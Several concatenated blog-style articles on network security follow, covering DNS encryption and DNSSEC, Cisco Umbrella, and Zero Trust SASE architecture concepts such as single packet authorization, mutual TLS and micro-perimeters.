We have DNS over TLS and DNS over HTTPS, two standards for encrypting DNS queries to prevent external parties from being able to read them. DNS over TLS (DoT) and DoH (DNS over HTTPS) add a secure layer to an insecure protocol. By using DoH and DoT, users can ensure the privacy of DNS responses and block eavesdropping on their DNS requests (which reveals the sites they are visiting).

Cisco Umbrella DNS: Secure the protocol

Application layers use security protocols such as HTTPS, DMARC, etc. So, the DNS protocol should be no exception. DNS Security Extensions (DNSSEC) is a security protocol that defends against attacks by digitally signing data to help guarantee its validity. The signing must happen at every level in the DNS lookup process. That can make it a complicated setup.

DNSSEC was one of the first things we started implementing, which is much older than many assume. The first talks about DNSEEC were in the early 1990s. It is a way to ensure that you know that a record you get back has not been tampered with and that the server you are talking to is the server you intend to talk to. All of this is done with PKI. 

Cisco Umbrella DNS
Diagram: Cisco Umbrella DNS.

Public Key Infrastructure (PKI) 

The server has a public and private key pair. So we have the public key, and they can sign the record. However, as we maintain a distributed hierarchy in DNS, we must guarantee that these are signed up to the Root. DNSSEC implements a hierarchical digital signing policy across all layers of DNS.

For example, in the case of a ‘google.com’ lookup, a root DNS server would sign a key for the.COM nameserver, and the.COM nameserver would then sign a key for google.com’s authoritative nameserver. DNSSEC not only allows a DNS server to verify the authenticity of the records it returns, but It also enables the assertion of the “non-existence of records.”

DNS resolvers can also be configured to provide security solutions. For example, some DNS resolvers provide content filtering, which can stop sites known to distribute Malware and spam, and botnet protection, which blocks communication with known botnets. Many of these secure DNS resolvers are free to use

Summary: DNS Security Solutions

Summary: DNS Security Solutions

This blog post delved into DNS security solutions, exploring the key concepts, benefits, and best practices for safeguarding one’s online activities.

Section 1: Understanding DNS Security

The DNS, often called the internet’s phonebook, translates domain names into IP addresses, allowing us to access websites by typing in familiar URLs. However, this critical system is susceptible to various security risks, such as DNS spoofing, cache poisoning, and DDoS attacks. Understanding these threats is crucial in comprehending the importance of DNS security solutions.

Section 2: DNS Security Solutions Explained

Several effective DNS security solutions are available to mitigate risks and fortify your online presence. Let’s explore a few key options:

  • DNS Filtering: This solution involves implementing content filtering policies to block access to malicious websites, reducing the likelihood of falling victim to phishing attempts and malware infections.
  • DNSSEC: Domain Name System Security Extensions (DNSSEC) provide cryptographic authentication and integrity verification of DNS data, preventing DNS spoofing and ensuring the authenticity of domain name resolutions.
  • Threat Intelligence Feeds: By subscribing to threat intelligence feeds, organizations can stay updated on emerging threats and proactively block access to malicious domains, bolstering their overall security posture.

Section 3: Benefits of DNS Security Solutions

Implementing robust DNS security solutions offers numerous benefits to individuals and organizations alike. Some notable advantages include:

– Enhanced Data Privacy: DNS security solutions protect sensitive user information, preventing unauthorized access or data breaches.

– Improved Network Performance: By filtering out malicious requests and blocking access to suspicious domains, DNS security solutions help optimize network performance and reduce potential downtime caused by cyberattacks.

– Mitigated Business Risks: By safeguarding your online infrastructure, DNS security solutions minimize the risk of reputational damage, financial loss, and legal repercussions due to cyber incidents.

Section 4: Best Practices for DNS Security

While investing in DNS security solutions is crucial, adopting best practices is equally important to maximize their effectiveness. Here are a few recommendations:

-Regularly update DNS software and firmware to ensure you benefit from the latest security patches and enhancements.

– Implement strong access controls and authentication mechanisms to prevent unauthorized access to DNS servers.

– Monitor DNS traffic for anomalies or suspicious activities, enabling prompt detection and response to potential security breaches.

Conclusion:

In an era where online threats continue to evolve, prioritizing DNS security is vital for individuals and organizations. By understanding the risks, exploring effective solutions, and implementing best practices, you can fortify your online security, safeguard your data, and confidently navigate the digital landscape.

Reverse Route Injection

Zero Trust SASE

Zero Trust SASE

In today's digital age, where remote work and cloud-based applications are becoming the norm, traditional network security measures are no longer sufficient to protect sensitive data. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines the principles of Zero Trust security with the flexibility and scalability of cloud-based architectures.

In this blog post, we will delve into the concept of Zero Trust SASE and explore its benefits and implications for the future of network security.

Zero Trust is a security model that operates on "never trust, always verify." It assumes that no user or device should be granted automatic trust within a network, whether inside or outside the perimeter. Instead, every user, device, and application must be continuously authenticated and authorized based on various contextual factors, such as user behavior, device health, and location.

SASE is a comprehensive security framework that combines networking and security capabilities into a single cloud-based service. It aims to simplify and unify network security by providing secure access to applications and data, regardless of the user's location or device.

SASE integrates various security functions, such as secure web gateways, cloud access security brokers, and data loss prevention, into a single service, reducing complexity and improving overall security posture.

Table of Contents

Highlights: Zero Trust SASE

The Lag in Security 

Today’s digital transformation and strategy initiatives require speed and agility in I.T. However, there is a lag, and that lag is with security. Security can either hold them back or not align with the fluidity needed for agility. As a result, we have decreased an organization’s security posture, which poses a risk that needs to be managed. We have a lot to deal with, such as the rise in phishing attacks, mobile malware, fake public Wi-Fi networks, malicious apps, and data leaks.

The Role of New Security Requirements

These are some of the challenges that new security requirements have propelled. One is the critical capability to continuously discover, assess, and adapt to ever-changing risk and trust levels. These are bundled into a Secure Access Service Edge: SASE definition solution and Zero Trust network design capabilities combined into one SASE architecture.

Related: For pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Model
  3. SASE Solution
  4. Cisco Secure Firewall
  5. SASE Definition



SASE Architecture

Key Zero Trust SASE Discussion Points:


  • The rise of SASE.

  • Challenges to existing networking.

  • The misconception of Trust.

  • SASE definition and SASE architecture.

  • SASE requirements.

Back to Basics: Zero Trust SASE

The SASE Concept

Gartner coined the SASE concept after seeing a pattern emerge in cloud and SD-WAN projects where full security integration was needed. We now refer to SASE as a framework and a security best practice. SASE leverages multiple security services into a framework approach.

The idea of SASE was not far from what we already did by integrating multiple security solutions into a stack that ensured a comprehensive, layered, secure access solution. By calling it a SASE framework, the approach to a complete solution somehow felt more focused than what the industry recognized as a best security practice.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

The Benefits of Zero Trust SASE:

1. Enhanced Security: Zero Trust SASE ensures that only authorized users and devices can access sensitive resources, minimizing the risk of data breaches and insider threats. Organizations can mitigate the impact of compromised credentials and unauthorized access attempts by continuously verifying user identities and device health.

2. Scalability and Flexibility: With Zero Trust SASE, organizations can scale their security infrastructure dynamically based on their needs. SASE solutions can adapt to changing network demands as cloud-based services, providing secure access to applications and data from anywhere, anytime, and on any device.

3. Simplified Management: By consolidating multiple security functions into a single service, Zero Trust SASE simplifies security management and reduces operational overhead. Organizations can centrally manage and enforce security policies across their entire network, eliminating the need for multiple-point solutions and reducing complexity.

4. Improved User Experience: Zero Trust SASE eliminates the need for traditional VPNs and complex access control mechanisms. Users can securely access applications and data directly from the cloud without backhauling traffic to a central location. This improves performance and user experience, especially for remote and mobile users.

The Rise of SASE

The rise of SASE and Zero Trust security strategy. The security infrastructure and decisions must become continuous and adaptive, not static, that formed the basis of traditional security methods. Consequently, we must enable real-time decisions that balance risk, trust, and opportunity. As a result, security has beyond a simple access control list (ACL) and zone-based segmentation based on VLANs. In reality, there is no network point to act as an anchor for security.

Zero trust SASE
Diagram: Zero Trust SASE: Digital transformation and strategy.

Zero Trust SASE: SASE Architecture

Many current network security designs and technologies were not designed to handle all the traffic and security threats we face today. This has forced many to adopt multiple-point products to address the different requirements. Remember that for every point product, there is an architecture to deploy, a set of policies to configure, and a bunch of logs to analyze.

I find correlating logs across multiple-point product solutions used in different domains hard. For example, a diverse team may operate the secure web gateways (SWG) to that of the virtual private network (VPN) appliances. It could be the case that these teams work in silos and are in different locations.

Challenges to existing networks

We have many challenges to existing networks and infrastructure that create big security holes and decrease security posture. In reality, several I.T. components give the entity more access than required. We have considerable security flaws with using I.P. addresses as a security anchor and static locations; the virtual private networks (VPN) and demilitarized zone (DMZ) architectures used to establish access are often configured to allow excessive implicit trust.  

The issue with a DMZ

The DMZ is the neutral network between the Internet and your organization’s private network. It’s protected by a front-end firewall that limits Internet traffic to specific systems within its zone. The DMZ can have a significant impact on security if not appropriately protected. Remote access technologies such as VPN or RDP, often located in the DMZ, have become common targets of cyberattacks. One of the main issues I see with the DMZ is that the bad actors know it’s there. It may be secured, but it’s visible.

The issue with the VPN

In basic terms, a VPN provides an encrypted server and hides your IP address. However, the VPN does not secure users when they land on a network segment and is based on coarse-grained access control where the user has access to entire network segments and subnets. Traditionally, once you are on a segment, there will be no intra-filtering on that segment. That means all users in that segment need the same security level and access to the same systems, but that is not always the case. 

Overly permissive network access

VPNs generally provide broad, overly permissive network access with only fundamental access control limits based on subnet ranges. So, the traditional VPN provides overly permissive access and security based on I.P. subnets.

Security infrastructure
Diagram: Security infrastructure: The issues.

SASE Architecture and Misconception of Trust 

Much of the non-zero trust security architecture is based on trust. Bad actors abuse this trust. On the other hand, examining a SASE overview includes Zero Trust networking and remote access as one of its components can adaptively offer the appropriate trust required at the time and nothing more.

It is like providing a narrow segmentation based on many contextual parameters continuously assessed for risk to ensure the users are who they are and that the entities, either internal or external to the network, are doing what they are supposed to do.

Removes excessive trust

A core feature of SASE and Zero Trust is that it removes the excessive trust once required to allow entities to connect and collaborate. Within a zero-trust environment, our implicit trust in traditional networks is replaced with explicit identity-based trust with a default denial. With an identity-based trust solution, we are not just looking at IP addresses to determine trust levels. After all, they are just binary, deemed a secure private or a less trustworthy public. This assumption is where all of our problems started. They are just ones and zeros.

Zero Trust concept: Proxy for trust

To improve your security posture, it would be best to stop relying primarily on IP addresses and network locations as a proxy for trust. We have been doing this for decades. There is minimal context to place a policy with the legacy constructs. To determine the trust of a requesting party, we need to examine multiple contextual aspects, not just IP addresses.

And the contextual aspects are continuously assessed for security posture. This is a much better way to manage risk and allows you to look at the entire picture before deciding to enter the network or access a resource.

zero trust requirements
Diagram: Zero Trust requirements. Lockdown of trust and access

Challenging Environments

More outside than inside

The current environmental challenge is that more users, devices, applications, services, and data are located outside an enterprise than inside. As a result, there has been a rapid rise in remote working, especially in recent times. Also, there has been an increase in the adoption of cloud-based services, particularly SaaS. These environmental changes have turned the enterprise network “inside out.”. So, the traditional perimeter that we had was useless.

Multi-cloud

Also, many organizations are adopting multi-cloud. There are challenges in deploying and managing native security offerings from multiple cloud service providers. The different service providers will have other management consoles and security capabilities that do not share or integrate the policies. Although we have technologies that help with this, cloud providers are different entities. So, to combat these, let’s say, environmental evolutions, we have attempted other attempts to secure our infrastructure.

SASE: First attempt to 

Organizations have been adopting different security technologies to combat these changes and include them in their security stack. Many of the security technologies are cloud-based services. Some of these services include the cloud-based secure web gateway (SWG), content delivery network [CDN], and web application firewall [WAF]. A secure web gateway (SWG) protects users from web-based threats and applies and enforces acceptable corporate use policies. 

A content delivery network (CDN) refers to a geographically distributed group of servers working together to deliver Internet content quickly. A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet.

The data center is the center of the universe.

However, even with these welcomed additions to security, the general trend was that the data center is still the center of most enterprise networks and network security architectures. Let’s face it; these designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

SASE: Second attempt to

The next attempt was for a converged cloud-delivered secure access service edge (SASE) to accomplish this shift in the landscape. And that is what SASE architecture does. As you know, the SASE architecture relies on multiple contextual aspects to establish and adapt trust for application-level access.

It does not concern itself with large VLAN and broad-level access or believes that the data center is the center of the universe. Instead, the SASE architecture is often based on PoP, where each PoP acts as the center of the universe.

The SASE definition and its components are a transformational architecture that can combat many of these discussed challenges. A SASE solution converges networking and security services into one unified, cloud-delivered solution that includes the following core capabilities of sase.

From the network side of things: SASE in networking

    1. Software-defined wide area network (SD-WAN)
    2. Virtual private network (VPN)
    3. Zero Trust Network ZTN
    4. Quality of service (QoS)
    5. Software-defined perimeter (SDP)

From the security side of things: SASE capabilities in security

    1. Firewall as a service (FWaaS)
    2. Domain Name System (DNS) security
    3. Threat prevention
    4. Secure web gateways
    5. Data loss prevention (DLP)
    6. Cloud access security broker (CASB)

Zero Trust SASE: What the SASE architecture changes

SASE changes the focal point to the identity of the user and device. With traditional network design, we have the on-premises data center that is considered the center of the universe. With SASE, that architecture changes this to match today’s environment and moves the perimeter to the actual user, devices, or PoP with some SASE designs.  In contrast to the traditional enterprise network and security architectures, the internal data center is the focal point for access. 

SASE features
Diagram: SASE features

VPN Security Scenario 

The limitations of traditional remote access VPNs

Remote access VPNs are primarily built to allow users outside the perimeter firewall to access resources inside the perimeter firewall. As a result, they often follow a hub-and-spoke architecture with users connected by tunnels of various lengths depending on their distance from the data center. Traditional VPNs introduce a lot of complexity. For example, what do you do if you have multiple sites where users need to access applications? With this type of scenario, the cost of management would be high. 

Tunnel based on I.P

What’s happening here is that the tunnel creates an extension between the client device and the application location. The tunnel is based on IP addresses on the client device and the remote application. Now that there is I.P. connectivity between the client and the application, the network where the application is located is extended to the client.

However, the client might not sit in an insecure hotel room or from home. These may not be sufficiently protected, and such locations should be considered insecure. The traditional VPN has many issues to deal with. They are user-initiated, and policy often permits split-tunnel VPN where there can be no Internet or cloud traffic inspection.

SASE and VPN: A zero-trust VPN solution

A SASE solution encompasses VPN services and enhances the capabilities to operate in cloud-based infrastructure to route traffic. On the other hand, with SASE, the client connects to the SASE PoP, which carries out security checks and forwards the request to the application. A SASE design still allows clients to access the application, but they can only access that specific application and nothing more, like a stripped-down VLAN known as a micro-segmentation.

Clients must pass security controls, and no broad-level access is susceptible to lateral movements. Access control is based on an allowlist rather than the traditional blocklist rule. Also, other variables present in the request context are used instead of using I.P. addresses as the client identifier. As a result, the application is now the access path, not the network.

ZTNA remote access

So, no matter what type of VPN services you use, the SASE provides a unified cloud to connect to instead of backhauling to a VPN gateway—simplifying management and policy control. Well-established technologies such as VPN, secure web gateway, and firewall are being reviewed and reassessed in Zero Trust remote access solutions as organizations revisit approaches that have been in place for over a decade. 

A quick recommendation: SASE and SD-WAN

The value of SD-WAN is high. However, it also brings many challenges, including new security risks. In some of my consultancies, I have seen unreliable performance and increased complexity due to the need for multiple overlays. Also, these overlays need to terminate somewhere, and this will be at a hub site.

However, when combined with SASE, the SD-WAN edge devices can be connected to a cloud-based infrastructure rather than the physical SD-WAN hubs. This brings the value of interconnectivity between branch sites without the complexity of deploying or managing physical Hub sites.

sase in networking
Diagram: SASE in networking.

Zero Trust SASE: Vendor considerations

SASE features converge various individual components into one connected, cloud-delivered service, making it easy to control policies and behaviors. The SASE architecture is often based on a PoP design. When examining the SASE vendor, the vendor’s PoP layout should be geographically diverse, with worldwide entry and exit points.

Also, considerations should be made regarding the vendor’s edge/physical infrastructure providers or colocation facilities. We can change your security posture, but we can’t change the speed of light and the laws of physics.

SASE capabilities and route optimizations

Consider how the SASE vendor routes traffic in their PoP fabric. There should be route optimization at each PoP. Some route optimizations are for high availability, while others are for performance. Does the vendor offer cold-potato or hot-potato routing? The cold-potato routing means bringing the end-user device into the provider’s network as soon as possible. On the other hand, “hot-potato routing” means the end user’s traffic traverses more of the public Internet.

The Main Zero Trust SASE Architecture Requirements List

The following is a list of considerations to review when discussing SASE with your preferred cybersecurity vendor.

zero trust environment
Diagram: Zero trust environment

Zero Trust SASE requirements: Information hiding

Secure access service requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection is inside or outside the network perimeter. Then, real-time encrypted connections are created between the requesting client and the protected asset. As a result, all SASE-protected servers and services are hidden from all unauthorized network queries and scan attempts.

You can’t attack what you can’t see.

The base for network security started by limiting visibility – you cannot attack what you cannot see. Public and private IP addresses range from separate networks. This was the biggest mistake we ever made as I.P. addresses are just binary, whether they are deemed public or private. If a host were assigned a public address and wanted to communicate with a host with a private address, it would need to go through a network address translation (NAT) device and have a permit policy set.

Security based on the visibility

Network address translation is mapping an IP address space into another by modifying network address information in the I.P. header of packets while they are in transit across a traffic routing device. Limiting visibility this way works to a degree, but we cannot get away from the fact that a) if you have the I.P. address of someone, you can reach them, and b) if a port is open, you can potentially connect to it. Therefore, the traditional security method can open your network wide for compromise, especially when bad actors have all the tools. However, finding, downloading, and running a port scanning tool is not hard.

“Nmap,” for Network Mapper, is the most widely used port scanning tool. Nmap works by checking a network for hosts and services. Once found, the software platform sends information to those hosts and services, responding. Nmap reads and interprets the response and uses the data to create a network map.

Example: Single Packet Authorization

Zero Trust network security is used for information and infrastructure hiding through lightweight protocols such as a single packet authorization (SPA). No internal IP addresses or DNS information is shown, creating an invisible network.

As a result, we have zero visibility and connectivity, only establishing connectivity after clients prove they can be trusted to allow legitimate traffic. Now, we can have various protected assets hidden regardless of location: on-premise, public or private clouds, a DMZ, or a server on the internal LAN, in keeping with today’s hybrid environment.

This approach mitigates denial-of-service attacks. Anything internet-facing is reachable on the public Internet and, therefore, susceptible to bandwidth and server denial-of-service attacks. The default-drop firewall is deployed, with no visible presence to unauthorized users. Only good packets are allowed.

Zero Trust SASE tools: Single packet authorization (SPA)

Single packet authorization (SPA) also allows for attack detection. If a host receives anything other than a valid SPA packet or similar construct, it views that packet as part of a threat. The first packet to a service must be a valid SPA packet or similar security construct.

If it receives another packet type, it views this as an attack, which is helpful for bad packet detection. Therefore, SPA can determine an attack based on a single malicious packet, a highly effective way to detect network-based attacks. Thus, external network and cross-domain attacks are detected.

single packet authorization
Diagram: Single packet authorization (spa)

Zero Trust SASE architecture requirements: Mutually encrypted connections

Transport Layer Security ( TLS ) is an encryption protocol that protects data when it moves between computers. When two computers send data, they agree to encrypt the information in a way they both understand. Transport layer security (TLS) was designed to provide mutual device authentication before enabling confidential communication over the public Internet.

However, the standard TLS configuration is the validation that ensures that the client is connected to a trusted entity. So, the typical TLS adoptions authenticate servers to clients, not clients to servers. 

Mutually encrypted connections

SASE uses the full TLS standard to provide mutual, two-way cryptographic authentication. Mutual TLS provides this and goes one step further to authenticate the client. Mutual TLS connections are set up between all components in the SASE architecture.

Mutual Transport Layer Security (mTLS) is a process that establishes an encrypted TLS connection in which both parties use X. 509 digital certificates to authenticate each other.  MTLS can help mitigate the risk of moving services to the cloud and can help prevent malicious third parties from imitating genuine apps.

Firstly, this offers robust device and user authentication as connections from unauthorized users and devices are mitigated. Secondly, forged certificates, which are attacks aimed at credential theft, are disallowed. This will reduce impersonation attacks where a bad actor can forge a certificate from a compromised certificate authority.

Zero Trust SASE architecture requirements: Need to know the access model

Thirdly, SASE employs a need-to-know access model. As a result, SASE permits the requesting client to view only the allowed resources appropriate to the assigned policy. Users are associated with their devices that are validated based on policy. Only connections to the specifically requested service are enabled, and no other connection is allowed to any other service. 

SASE provides additional information, such as who made the connection, from what device, and to what service. All these give you full visibility into all the established connections, which is pretty hard to do if you have an IP-based solution. So now we have a contextual aspect of determining the level of risk. As a result, it makes forensics easier. The SASE architecture only accepts good packets; bad packets can be analyzed and tracked for forensic activities.

A key point: Device validation

Secondly, it enforces device validation, which helps against threats from unauthorized devices. Not only can we examine the requesting user, we can also perform device validation. Device validation ensures that the machine is running trusted hardware and used by the appropriate user.

Finally, suppose a device does become compromised. In that case, there is a complete lockdown on lateral movements as a user is only allowed access to the resource it is authorized to. Or they could be placed into a sandbox zone where human approval must intervene and assess the situation.

Zero Trust SASE architecture requirements: Dynamic access control

This traditional type of firewall is limited in scope as it cannot express or enforce rules based on identity information, which you can with zero trust identity. Attempting to model identity-centric control with the limitations of the 5-tuple, SASE can be used alongside traditional firewalls and take over the network access control enforcement that we try to do with conventional firewalls.

SASE deploys a dynamic firewall that starts with one rule – deny all. Then, requested communication is dynamically inserted into the firewall, providing an active firewall security policy instead of static configurations. For example, every packet hitting the firewall is inspected with a single packet authentication (SPA) and then quickly verified for a connection request. 

sase and zero trust
Diagram: Zero trust capabilities

A key point: Dynamic firewall

Once established, the firewall is closed again. Therefore, the firewall is dynamically opened only for a specific period. The connections made are not seen by rogues outside the network or the user domain within the network.

Allows dynamic, membership-based enclaves that prevent network-based attacks. The SASE dynamically binds users to devices, enabling those users to access protected resources by dynamically creating and removing firewall rules.

Access to protected resources is facilitated by dynamically creating and removing inbound and outbound access rules. Therefore, we now have more precise access control mechanisms and considerably reduced firewall rules.

Zero Trust SASE architecture requirement: Micro perimeter

Traditional applications were grouped into VLANs whether they offered similar services or not. Everything on that VLAN was reachable. The VLAN was a performance construct to break up broadcast domains but was pushed into the security world but never meant to be there. 

Its prime use was to increase performance. However, it was used for security in what we know as traditional zone-based networking. The segments in zone-based networks are too large and often have different devices with different security levels and requirements.

Logical-access boundary

SASE enables this by creating a logical access boundary encompassing a user and an application or set of applications. And that is it—nothing more and nothing less. Therefore, we have many virtual micro perimeters specific to the business instead of the traditional main inside/outside perimeter. Virtual perimeters allow you to grant access to the particular application, not the underlying network or subnet.

sase and zero trust
Diagram: SASE and micro perimeters

Reduce the attack surface.

The smaller micro perimeters reduce the attack surface and limit the need for excessive access to all ports and protocols or all applications. These individualized “virtual perimeters” encompass only the user, the device, and the application. They are created and are specific to the session and then closed again when the session is over or if there is a change in the risk level, and the device or user needs to perform setup authentication.

Software-defined perimeter (SDP)

Also, SASE only grants access to the specific application at an application layer. The SDP part of SASE now controls which devices and applications can access distinctive services at an application level. Permitted by a policy granted by the SDP part of SASE, machines can only access particular hosts and services and cannot access network segments and subnets.

Broad network access is eliminated, reducing the attack surface to an absolute minimum.  SDP provides a fully encrypted application communication path. However, the binding application permits only authorized applications, so they can only communicate through the established encrypted tunnels, thus blocking all other applications from using them.

This creates a dynamic perimeter around the application, including connected users and devices. Furthermore, it offers a narrow access path—reducing the attack surface to an absolute minimum.

Zero Trust SASE architecture requirement: Identity-driven access control

Traditional network solutions provide coarse-grained network segmentation based on someone’s I.P. address. However, someone’s I.P. address is not a good hook for security and does not provide much information about user identity. SASE enables the creation of microsegmentation based on user-defined controls, allowing a 1-to-1 mapping, unlike with a VLAN, where there is the potential to see everything within that VLAN.

Identity-aware access

SASE provides adaptive, identity-aware, precision access for those seeking more precise access and session control to applications on-premises and in the cloud. Access policies are primarily based on user, device, and application identities.

The procedure is applied independent of the user’s physical location or the device’s I.P. address, except where it prohibits it. This brings a lot more context to policy application. Therefore, if a bad actor gains access to one segment in the zone, they are prevented from compromising any other network resource.

Implications for the Future:

Zero Trust SASE represents the future of network security as organizations increasingly adopt cloud-based applications and embrace remote workforces. With the proliferation of IoT devices, edge computing, and hybrid cloud environments, traditional security models are no longer sufficient to protect critical assets.

Zero Trust SASE provides a holistic and adaptive approach to security, ensuring that organizations can defend against evolving threats and maintain a strong security posture in the digital era.

 

Summary: Zero Trust SASE

In today’s rapidly evolving digital landscape, where remote work and cloud-based applications have become the norm, traditional security measures are no longer sufficient. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines network security and wide-area networking into a unified framework. In this blog post, we explored the concept of Zero Trust SASE and its implications for the future of cybersecurity.

Section 1: Understanding Zero Trust

Zero Trust is a security framework that operates under the principle of “never trust, always verify.” It assumes no user or device should be inherently trusted, regardless of location or network. Instead, Zero Trust focuses on continuously verifying and validating identity, access, and security parameters before granting any level of access.

Section 2: The Evolution of SASE

Secure Access Service Edge (SASE) represents a convergence of network security and wide-area networking capabilities. It combines security services, such as secure web gateways, firewall-as-a-service, and data loss prevention, with networking functionalities like software-defined wide-area networking (SD-WAN) and cloud-native architecture. SASE aims to provide comprehensive security and networking services in a unified, cloud-delivered model.

Section 3: The Benefits of Zero Trust SASE

a) Enhanced Security: Zero Trust SASE brings a holistic approach to security, ensuring that every user and device is continuously authenticated and authorized. This reduces the risk of unauthorized access and mitigates potential threats.

b) Improved Performance: By leveraging cloud-native architecture and SD-WAN capabilities, Zero Trust SASE optimizes network traffic, reduces latency, and enhances overall performance.

c) Simplified Management: With a unified security and networking framework, organizations can streamline their management processes, reduce complexity, and achieve better visibility and control over their entire network infrastructure.

Section 4: Implementing Zero Trust SASE

a) Comprehensive Assessment: Before adopting Zero Trust SASE, organizations should conduct a thorough assessment of their existing security and networking infrastructure, identify vulnerabilities, and define their security requirements.

b) Architecture Design: Organizations need to design a robust architecture that aligns with their specific needs and integrates Zero Trust principles into their existing systems. This may involve deploying virtualized security functions, adopting SD-WAN technologies, and leveraging cloud services.

c) Continuous Monitoring and Adaptation: Zero Trust SASE is an ongoing process that requires continuous monitoring, analysis, and adaptation to address emerging threats and evolving business needs. Regular security audits and updates are crucial to maintaining a solid security posture.

Conclusion:

Zero Trust SASE represents a paradigm shift in cybersecurity, providing a comprehensive and unified approach to secure access and network management. By embracing the principles of Zero Trust and leveraging the capabilities of SASE, organizations can enhance their security, improve performance, and simplify their network infrastructure. As the digital landscape continues to evolve, adopting Zero Trust SASE is not just an option—it’s a necessity to safeguard the future of our interconnected world.

rsz_secure_access_service_edge1

SASE Definition

SASE Definition

In today's digital landscape, organizations constantly seek ways to enhance network security, simplify infrastructure, and optimize performance. One emerging concept that has gained significant attention is Secure Access Service Edge (SASE). In this blog post, we will delve into the definition of SASE, its key components, and how it can revolutionize how businesses approach network and security architecture.

Secure Access Service Edge (SASE) is a transformative network architecture model that combines network and security services into a unified cloud-native solution. It offers a holistic approach to networking, allowing organizations to connect securely to cloud resources, applications, and data centers, regardless of their location or the devices being used.

Table of Contents

Highlights: SASE Definition

Multiple network and security functions 

SASE definition, or Secure Access Service Edge, is a modern networking solution that combines multiple security functions into a single platform. This solution is designed to provide secure access to cloud-based applications, data, and services. SASE architecture is built on top of a cloud-native platform that integrates software-defined wide-area networking (SD-WAN) and security functions like secure web gateway (SWG), cloud access security broker (CASB), firewall as a service (FWaaS), zero-trust network access (ZTNA).

Traditional complex methods

SASE meaning is becoming increasingly popular among organizations because it provides a more flexible and cost-effective approach to networking and security. The traditional approach to networking and security involves deploying multiple devices or appliances, each with its own set of functions. This approach can be complex, time-consuming, and expensive to manage. On the other hand, SASE simplifies this process by integrating all the necessary functions into a single platform.

SASE: A scalable approach

SASE also provides a more scalable and adaptable solution for organizations adopting cloud-based applications and services. With SASE, organizations can connect to cloud-based platforms like AWS, Azure, or Google Cloud, ensuring secure data and application access. Additionally, SASE provides better visibility and control over network traffic, allowing organizations to monitor and manage their network more effectively.

SASE definition

Related: For additional pre-information, you may find the following helpful for pre-information:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE



SASE Definition

Key SASE Meaning Discussion Points:


  • New phase of WAN transformation.

  • WAN challenges and how SASE solves them.

  • Challenge: Managing the network.

  • Challenge: Site connectivity.

  • Challenge: Site performance.

  • Challenge: Cloud agility.

  • Challenge: Security.

Vendor Example: Cisco Umbrella

The Power of Secure Access Service Edge (SASE)

One of the key concepts associated with Cisco Umbrella is Secure Access Service Edge (SASE). SASE combines network security and wide-area networking (WAN) capabilities into a single cloud-native service. By converging multiple security functions such as secure web gateways, firewall-as-a-service, and data loss prevention, SASE provides a unified and simplified approach to network security. Cisco Umbrella is crucial in the SASE framework by seamlessly integrating cloud security services with the network.

Key Features and Benefits

Cisco Umbrella offers a range of powerful features that enhance network security. These include threat intelligence, advanced malware protection, secure internet gateway, and DNS-layer security. By leveraging the power of machine learning and data analytics, Umbrella continuously analyzes global internet activity to identify and block threats in real-time. Moreover, its intuitive dashboard gives administrators granular visibility and control over network traffic, enabling them to make informed decisions and respond swiftly to potential threats.

Cisco Umbrella
Diagram: Cisco Umbrella. Source is Cisco

SASE: A Cloud-Centric Approach

Firstly, the SASE meaning is down to the environment that we are in. In a cloud-centric world, users and devices require access to services everywhere. The focal point has changed. Now, the identity of the user and device, as opposed to the traditional model, focuses solely on the data center with many network security components. These environmental changes have created a new landscape we must protect and connect.

Many common problems challenge the new landscape. Due to deployed appliances for different technology stacks, enterprises are loaded with complexity and overhead. The legacy network and security designs increase latency. In addition, the world is encrypted when considering Zero Trust SASE. This needs to be inspected without degrading application performance.

These are reasons to leverage a cloud-delivered secure access service edge (SASE). SASE means a tailored network fabric optimized where it makes the most sense for the user, device, and application – at geographically dispersed PoPs enabling technologies that secure your environment with technologies such as single packet authorization.

SASE explained
Diagram: SASE explained. Source Fortinet.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

Components of SASE:

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond more to changing business requirements, reduce costs, and improve overall efficiency.

Benefits of SASE:

1. Enhanced Security: By integrating security into the network infrastructure, SASE provides a unified and consistent security approach across all network edges, reducing potential vulnerabilities and simplifying security management.

2. Increased Agility: SASE enables organizations to adapt quickly to changing business requirements by providing on-demand network and security services that can be rapidly provisioned and scaled.

3. Improved User Experience: With SASE, users can securely access applications and resources from anywhere, on any device, without compromising performance or experiencing network congestion.

4. Cost Savings: By consolidating network and security services into a single cloud-native solution, organizations can reduce hardware and maintenance costs, streamline their infrastructure, and optimize resource utilization.

Secure Access Service Edge

SASE Advantages

Cloud Delivered: Network and Security

  • Unified and consitent security to all edges. 

  • Increased agility with on-demand network and security services

  • Improved user experience. Same access from all locations.

  • Cost savings with a single cloud-native solution.

Secure Access Service Edge

SASE Technologies

Cloud Delivered: Network and Security

  • SD-WAN

  • Cloud Access Security Broker (CASB)

  • NGFW and Firewall as a service

  • Zero Trust Network Access (ZTNA)

